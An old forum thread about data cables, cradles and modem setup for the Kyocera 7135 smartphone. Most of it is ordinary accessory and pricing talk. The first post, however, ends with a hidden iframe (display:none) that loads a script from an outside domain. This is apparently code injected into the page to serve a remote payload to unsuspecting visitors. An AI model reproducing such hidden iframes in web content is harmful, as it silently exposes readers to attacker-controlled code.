+ Reply to Thread
Results 1 to 11 of 11
  1. #1
    Registered User
    Join Date
    01-10-2003
    Posts
    3

    7135 cables to computer

    I am expecting to get my long-await 7135 Tuesday from Verizon store. I would like to connect it to my laptop while traveling. I know, reading this forum, that it can be done, but I don't want to carry the cradle to do it. Does anyone know of a third-party USB cable that will work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    12-30-2002
    Location
    Milwaukee, WI
    Posts
    280
    Kyocera makes a "true" USB cable that plugs into the phone's data port. I think its like $30 or $40. I got mine right away when I got the phone and I love it. I've used it for both HotSyncing and for data connections on my iBook. I don't know of any third party cables however.
    Sorry, but I no longer make 7135 headset adapters.

  3. #3
    Registered User sndtubes's Avatar
    Join Date
    04-01-2003
    Posts
    86
    My 7135 came with a USB/Serial cradle. It was the Alltel version. I don't know if the VZW will. You can use the cable with either the serial or USB port. The only bad thing I've found about the cradle is that you can't use it with the accessory keyboard. It would be nice if an adapter could be made. Think it is possible, coolcat?

  4. #4
    Registered User
    Join Date
    12-16-2002
    Location
    NY
    Posts
    36

    Re: 7135 cables to computer

    Originally posted by MGBarnette
    I am expecting to get my long-await 7135 Tuesday from Verizon store. I would like to connect it to my laptop while traveling. I know, reading this forum, that it can be done, but I don't want to carry the cradle to do it. Does anyone know of a third-party USB cable that will work?

    I Ordered Mine today from Verizon and was told that I will have it on Wed. Also called Dan at Danscellphones and ordered the True USB Data Cable for $21.99 compared to Kyocera & Verizon for $39.99 plus other accessories for the 7135 and SAVED $83 :jump

  5. #5
    AJR
    AJR is offline
    Registered User
    Join Date
    04-04-2003
    Posts
    64
    Got all my accessories on order from Dan as well, including the USB data cable. I even called him to ask if I could add a battery to my order and get it shipped with the other things I got. Hopefully they went out today... I'm expecting the actual phone tomorrow or Wednesday.

    I'm also looking for a good price on the Lexar 256MB SD card. eCost has it for $65 with free shipping, but they charge a $6 handling fee, and tax (I'm in CA). Excessive handling charges piss me off! I'd rather pay $4 for shipping charges rather than free shipping and $6 handling!

    I want the Lexar instead of SanDisk based on all I've been reading about transfer speeds. I'm willing to spend more on the Lexar, but not willing to spend more for the same item (the Lexar 256MB SD ranges from $65 to $110 online... that's a big difference). When you add tax and shipping into the mix, the least expensive option can become the most expensive!

  6. #6
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    I'm also going to order the USB cable from Dan soon... $21.99 shipped is a great deal
    Please visit my picture site: Robert-O-Rama :)

  7. #7
    Registered User
    Join Date
    10-09-2003
    Location
    San Francisco, CA
    Posts
    38
    How do you get the phone to communicate via the Express Net to the laptop PC for surfing the net on the PC? I am currently using the standard docking station USB connection.

  8. #8
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by PhilippZ
    How do you get the phone to communicate via the Express Net to the laptop PC for surfing the net on the PC? I am currently using the standard docking station USB connection.

    One of the manuals on your CD is the "modem setup guide.pdf". It contains instructions for setting up the Kyo as a modem.

    Then to use express network, set up a dial up connection using your_mobile_number@vzw3g.com as your user name (replacing "your_mobile_number with your mobile telephone number), vzw as the password, and #777 as the digits to dial.


    And remember, this boards search function is your friend....

    Alan

  9. #9
    Registered User
    Join Date
    11-03-2002
    Posts
    72

    Data Cables?

    I have some questions...

    1) I have a serial data cable for the 6035. The connector fits fine. There is a power socket on this cable that fits the power adapters for the 6025. Will this power the 7035 through this cable?

    2) Can I use the USB and or the serial data cables to HOT SYNC the 7035? Do the 7035 versions have a power socket?

    3) Are there Macintosh drivers for the USB cable?

    4) Where can the dual serial/usb data cable shipped with the Alltel phone be purchased?

  10. #10
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Data Cables?

    Originally posted by smartphone fan
    I have some questions...

    1) I have a serial data cable for the 6035. The connector fits fine. There is a power socket on this cable that fits the power adapters for the 6025. Will this power the 7035 through this cable?

    2) Can I use the USB and or the serial data cables to HOT SYNC the 7035? Do the 7035 versions have a power socket?

    3) Are there Macintosh drivers for the USB cable?

    4) Where can the dual serial/usb data cable shipped with the Alltel phone be purchased?
    I can't answer #1, I don't know.

    2: Yes, and yes.

    3: Same ones that drive the usb/serial cradle.

    4: The Hotsync cradle has both serial and usb connectors. No other cable comes with the Alltel phones.

    Alan

  11. #11
    Registered User
    Join Date
    11-03-2002
    Posts
    72

    Re: Re: Data Cables?

    Originally posted by alanb
    I can't answer #1, I don't know.

    2: Yes, and yes.

    3: Same ones that drive the usb/serial cradle.

    4: The Hotsync cradle has both serial and usb connectors. No other cable comes with the Alltel phones.

    Alan
    The post with the usb/serial cable must have been a mispirnt. The poster must have meant cradle.

    Thank you.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts